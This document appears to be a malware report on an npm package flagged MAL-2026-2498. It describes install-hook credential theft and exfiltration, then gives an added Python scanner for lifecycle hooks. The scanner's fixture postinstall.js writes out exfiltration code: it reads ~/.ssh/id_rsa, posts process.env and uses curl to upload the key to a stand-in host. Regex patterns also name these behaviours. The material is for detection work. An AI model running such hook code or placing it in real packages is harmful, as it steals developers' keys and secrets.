Note: This report is updated by a verification record
Multiple pieces of evidence indicate malicious behavior: data exfiltration, sensitive file access, obfuscated code, and suspicious network connections.
The package is marked as malware by OSV (MAL-2026-2498, source: amazon-inspector).
The package exhibits multiple malicious behaviors. The postinstall.js script reads sensitive files (Evidence 5), exfiltrates environment variables (Evidence 4), attempts DNS beaconing (Evidence 6) and HTTPS exfiltration (Evidence 7, 8, 9), and executes obfuscated code (Evidence 10). It also attempts to open a raw IP socket connection (Evidence 11). The YARA rules eval_base64, id_rsa_not_ssh, nodejs_phone_home, and curl_https_ssh all match postinstall.js, each flagging one of the behaviors above. The package.json registers a postinstall script (Evidence 12); npm runs lifecycle scripts automatically during installation unless `--ignore-scripts` is set, which is why install hooks are a common technique for malicious packages. Taken together, these findings strongly indicate that the package is malicious.
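To show how the findings above can be reproduced mechanically, the following is an added example (not the report's own tooling, and not the scanner OSV or amazon-inspector used): a small Python scanner that reads a package's package.json, picks out the npm lifecycle hooks (preinstall/install/postinstall/prepare), resolves the script file each hook invokes, and runs regex heuristics over it. The heuristic names reuse the YARA rule names cited in the report (eval_base64, id_rsa_not_ssh, nodejs_phone_home, curl_https_ssh), but the patterns behind them are assumptions written for this example, not the real rules; env_exfil, dns_beacon and raw_socket are additional assumed names. The sample package.json and postinstall.js are constructed fixtures using reserved hostnames and TEST-NET addresses; they are only ever read as text, never executed.

```python
"""Heuristic scanner for npm install-hook scripts.

Added example, not from the original report. Rule names mirror the YARA rules
the report cites, but the regexes are assumptions made for illustration.
"""
import json
import re
import shlex
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed patterns; the real YARA rules behind these names are not on the page.
HEURISTICS: Dict[str, re.Pattern] = {
    "eval_base64": re.compile(r"eval\s*\([^;]{0,200}base64"),          # eval() fed base64-decoded data
    "id_rsa_not_ssh": re.compile(r"\.ssh/id_rsa"),                      # private-key path referenced by non-ssh code
    "nodejs_phone_home": re.compile(r"require\(\s*['\"](https?|dns)['\"]\s*\)"),
    "curl_https_ssh": re.compile(r"curl\s[^\n]*https://[^\n]*\.ssh"),   # curl upload that mentions ~/.ssh
    "env_exfil": re.compile(r"JSON\.stringify\(\s*process\.env\s*\)"),  # assumed name
    "dns_beacon": re.compile(r"dns\.(resolve|lookup)\w*\("),            # assumed name
    "raw_socket": re.compile(r"net\.Socket\(\)|net\.connect\("),        # assumed name
}

# Constructed fixture: inert text that exercises every heuristic above.
SAMPLE_PACKAGE_JSON = {
    "name": "constructed-sample",
    "version": "0.0.0",
    "scripts": {"postinstall": "node postinstall.js", "test": "echo ok"},
}
SAMPLE_POSTINSTALL_JS = """
const fs = require("fs"), os = require("os");
const https = require("https"), dns = require("dns"), net = require("net");
const key = fs.readFileSync(os.homedir() + "/.ssh/id_rsa", "utf8");
const env = JSON.stringify(process.env);
dns.resolve("example.invalid", () => {});
https.request({ host: "example.invalid", method: "POST" }).end(env);
new net.Socket().connect(443, "192.0.2.1");
require("child_process").execSync("curl -s https://example.invalid/up -T " + os.homedir() + "/.ssh/id_rsa");
eval(Buffer.from("Y29uc29sZS5sb2coMSk=", "base64").toString());
"""


def lifecycle_scripts(pkg: dict) -> Dict[str, str]:
    """Return only the scripts npm runs automatically during install."""
    scripts = pkg.get("scripts", {}) or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS}


def script_file_from_command(cmd: str) -> Optional[str]:
    """Pick the JS file a hook command invokes, e.g. 'node postinstall.js'."""
    for tok in shlex.split(cmd):
        if tok.endswith((".js", ".cjs", ".mjs")):
            return tok
    return None


def scan_source(src: str) -> List[str]:
    """Return the sorted names of every heuristic that fires on the text."""
    return sorted(name for name, rx in HEURISTICS.items() if rx.search(src))


def scan_package(pkg_dir: Path) -> Dict[str, object]:
    """Scan each lifecycle hook's command line and the script file it runs."""
    pkg = json.loads((pkg_dir / "package.json").read_text())
    hooks: Dict[str, dict] = {}
    for hook, cmd in lifecycle_scripts(pkg).items():
        hits = set(scan_source(cmd))  # inline shell in the hook itself
        target = script_file_from_command(cmd)
        if target and (pkg_dir / target).is_file():
            hits.update(scan_source((pkg_dir / target).read_text()))
        hooks[hook] = {"command": cmd, "script": target, "hits": sorted(hits)}
    return {
        "name": pkg.get("name"),
        "hooks": hooks,
        "suspicious": any(h["hits"] for h in hooks.values()),
    }


def build_sample_package() -> Path:
    """Write the constructed fixture to a temp dir and return its path."""
    d = Path(tempfile.mkdtemp(prefix="pkgscan-"))
    (d / "package.json").write_text(json.dumps(SAMPLE_PACKAGE_JSON))
    (d / "postinstall.js").write_text(SAMPLE_POSTINSTALL_JS)
    return d


if __name__ == "__main__":
    print(json.dumps(scan_package(build_sample_package()), indent=2))
```

Run it against an unpacked tarball (`npm pack <name>` then extract) before installing, or keep `npm config set ignore-scripts true` on build hosts so that hooks never execute without review. The scanner is deliberately pattern-based: it will not catch code that builds its strings at runtime, which is exactly why the report's obfuscated-code evidence (eval of base64) carries weight on its own.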